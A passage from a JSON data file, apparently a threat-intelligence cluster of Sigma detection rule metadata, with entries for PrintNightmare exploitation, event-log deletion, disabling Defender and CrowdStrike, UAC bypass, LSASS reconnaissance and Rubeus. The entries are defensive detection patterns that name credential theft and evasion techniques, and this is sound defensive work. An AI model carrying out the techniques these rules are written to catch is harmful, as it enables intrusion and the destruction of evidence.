"https://github.com/cube0x0/CVE-2021-1675", "https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574", "cve.2021-1675" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", "value": "Potential PrintNightmare Exploitation Attempt" }, { "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_delete_teamviewer_logs.yml", "level": "low", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_teamviewer_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", "value": "TeamViewer Log File Deleted" }, { "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_delete_event_log_files.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_event_log_files.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "value": "EventLog EVTX File Deleted" }, { "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-16", "falsepositive": [ "During uninstallation of the tomcat server", "During log rotation" ], "filename": "file_delete_win_delete_tomcat_logs.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "Internal Research", "https://linuxhint.com/view-tomcat-logs-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_tomcat_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "value": "Tomcat WebServer Logs Deleted" }, { "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Legitime usage of SDelete" ], "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/9", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "value": "File Deleted Via Sysinternals SDelete" }, { "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "file_delete_win_delete_powershell_command_history.yml", "level": "medium", "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_powershell_command_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff301988-c231-4bd0-834c-ac9d73b86586", "value": "PowerShell Console History Logs Deleted" }, { "description": "Detects the creation of a binary file with the \".sed\" extension. The \".sed\" extension stand for Self Extraction Directive files.\nThese files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\nAttackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\nUsually \".sed\" files are simple ini files and not PE binaries.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-02-05", "falsepositive": [ "Unknown" ], "filename": "file_executable_detected_win_susp_embeded_sed_file.yml", "level": "medium", "logsource.category": "file_executable_detected", "logsource.product": "windows", "refs": [ "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", "https://en.wikipedia.org/wiki/IExpress", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab90dab8-c7da-4010-9193-563528cfa347", "value": "Potentially Suspicious Self Extraction Directive File Created" }, { "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", "meta": { "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_cimprovider_dll_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", "https://twitter.com/PhilipTsukerman/status/992021361106268161", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", "value": "DLL Execution Via Register-cimprovider.exe" }, { "description": "Detects execution of the Windows Kernel Debugger \"kd.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required" ], "filename": "proc_creation_win_kd_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_kd_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "27ee9438-90dc-4bef-904b-d3ef927f5e7e", "value": "Windows Kernel Debugger Execution" }, { "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_net_use_mount_internet_share.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_internet_share.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "value": "Windows Internet Hosted WebDav Share Mount Via Net.EXE" }, { "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", "meta": { "author": "frack113", "creation_date": "2021-07-12", "falsepositive": [ "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "value": "Uninstall Crowdstrike Falcon Sensor" }, { "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-03", "falsepositive": [ "Possible administrative activity", "Other Cmdlets that may use the same parameters" ], "filename": "proc_creation_win_powershell_defender_disable_feature.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", "https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", "value": "Powershell Defender Disable Scan Feature" }, { "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "value": "UAC Bypass Using ChangePK and SLUI" }, { "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", "meta": { "author": "frack113", "creation_date": "2022-05-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_utilityfunctions.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", "value": "UtilityFunctions.ps1 Proxy Dll" }, { "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_sysnative.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysnative.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "value": "Process Creation Using Sysnative Folder" }, { "description": "Detects usage of \"cmdkey.exe\" to add generic credentials.\nAs an example, this can be used before connecting to an RDP session via command line interface.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-03", "falsepositive": [ "Legitimate usage for administration purposes" ], "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml" ], "tags": [ "attack.credential-access", "attack.t1003.005" ] }, "related": [ { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "value": "New Generic Credentials Added Via Cmdkey.EXE" }, { "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", "meta": { "author": "Kirill Kiryanov, oscd.community", "creation_date": "2019-10-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1562", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", "value": "Sysmon Driver Unloaded Via Fltmc.EXE" }, { "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", "meta": { "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-12-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rar_susp_greedy_compression.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://decoded.avast.io/martinchlumecky/png-steganography", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_susp_greedy_compression.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "afe52666-401e-4a02-b4ff-5d128990b8cb", "value": "Suspicious Greedy Compression Using Rar.EXE" }, { "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_wsudo_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/M2Team/Privexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "value": "PUA - Wsudo Suspicious Execution" }, { "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_esentutl_webcache.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://redcanary.com/threat-detection-report/threats/qbot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" ], "tags": [ "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "value": "Esentutl Steals Browser Information" }, { "description": "Detects the execution of AdvancedRun utility", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_advancedrun.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/security-labs/operation-bleeding-bear", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://twitter.com/splinter_code/status/1483815103279603714", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1564.003", "attack.t1134.002", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "value": "PUA - AdvancedRun Execution" }, { "description": "Detects the execution \"AccCheckConsole\" a command-line tool for verifying the accessibility implementation of an application's UI.\nOne of the tests that this checker can run are called \"verification routine\", which tests for things like Consistency, Navigation, etc.\nThe tool allows a user to provide a DLL that can contain a custom \"verification routine\". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the \"AccCheckConsole\" utility.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-06", "falsepositive": [ "Legitimate use of the UI Accessibility Checker" ], "filename": "proc_creation_win_acccheckconsole_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/1477717351017680899?s=12", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_acccheckconsole_execution.yml" ], "tags": [ "attack.execution", "detection.threat-hunting" ] }, "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", "value": "Potential DLL Injection Via AccCheckConsole" }, { "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_lsass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "value": "LSASS Process Reconnaissance Via Findstr.EXE" }, { "description": "Detects suspicious Splwow64.exe process without any command line parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_splwow64_cli_anomaly.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_splwow64_cli_anomaly.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "value": "Suspicious Splwow64 Without Params" }, { "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://twitter.com/_JohnHammond/status/1531672601067675648", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", "value": "Potential Arbitrary Command Execution Using Msdt.EXE" }, { "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-21", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_rundll32_keymgr.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/NinjaParanoid/status/1516442028963659777", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_keymgr.yml" ], "tags": [ "attack.credential-access", "attack.t1555.004" ] }, "related": [ { "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "value": "Suspicious Key Manager Access" }, { "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-12-19", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_rubeus.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus", "https://github.com/GhostPack/Rubeus", "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1558.003", "attack.lateral-movement", "attack.t1550.003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", "value": "HackTool - Rubeus Execution" }, { "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", "meta": { "author": "TropChaud", "creation_date": "2023-01-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_system_info_uncommon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic", "https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/", "https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior", "https://nwgat.ninja/getting-system-information-with-wmic-on-windows/", "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar", "https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d5a1274-922a-49d0-87f3-8c653483b909", "value": "Uncommon System Information Discovery Via Wmic.EXE" }, { "description": "Detects execution of \"Diskshadow.exe\" in script mode to execute an script with a potentially uncommon extension.\nInitial baselining of the allowed extension list is required.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-15", "falsepositive": [ "False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required." ], "filename": "proc_creation_win_diskshadow_script_mode_susp_ext.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1dde5376-a648-492e-9e54-4241dd9b0c7f", "value": "Diskshadow Script Mode - Uncommon Script Extension Execution" }, { "description": "Detects a suspicious RDP session redirect using tscon.exe", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_tscon_rdp_redirect.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", 